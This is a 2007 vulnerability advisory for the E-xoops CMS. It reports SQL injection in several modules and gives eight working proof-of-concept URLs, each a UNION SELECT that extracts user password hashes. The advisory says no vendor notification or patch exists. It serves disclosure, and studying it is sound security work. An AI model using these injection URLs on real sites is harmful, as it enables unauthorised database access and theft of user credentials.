############################################ E-xoops multiple variable/scripts SQL injection vendor url: http://www.e-xoops.com Advisore: http://lostmon.blogspot.com/2007/12/ e-xoops-multiple-variablescripts-sql.html vendor notify:NO exploits available: YES ############################################ E-xoops is content-community management system written in PHP-MySQL. E-xoops contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the script not properly sanitizing user-supplied input to the 'lid','bid' and 'gid' variable, multiple script.This may allow an attacker to inject or manipulate SQL queries in the backend database. ################# Versions: ################# E-Xoops 1.08 E-Xoops 1.05 Rev3 E-Xoops 1.05 Rev2 E-Xoops 1.05 Rev1 and possible early versions. ################# Solution: ################# no solution available at this time Try to edit the source code. you can look this post in my group to patch E-xoops ,because the source code is veeeery similar to bcoos cms http://groups.google.com/group/lostmon/ browse_thread/thread/59f3b836fad5b009 and here you have a src reference for E-xoops 1.0.8 http://phpxref.com/xref/exoops/nav.html ################# Timeline: ################# Discovered:25-11-2007 vendor notify:-------- vendor response:------- disclosure:09-12-2007 ################# SQL injections: ################# http://localhost/e-xoops/modules/mylinks/ ratelink.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/adresses/ ratefile.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/mydownloads/ ratefile.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/mysections/ ratefile.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/myalbum/ ratephoto.php?lid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/banners/ click.php?bid=-1%20UNION%20SELECT%20pass %20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/arcade/ index.php?act=show_stats&gid=-1%20UNION% 20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201 http://localhost/e-xoops/modules/arcade/index.php? act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM %20e_xoops_users%20LIMIT%201 #################### €nd ######################## Thnx to estrella to be my ligth Thnx To FalconDeOro for his support Thnx To Imydes From http://www.imydes.com -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....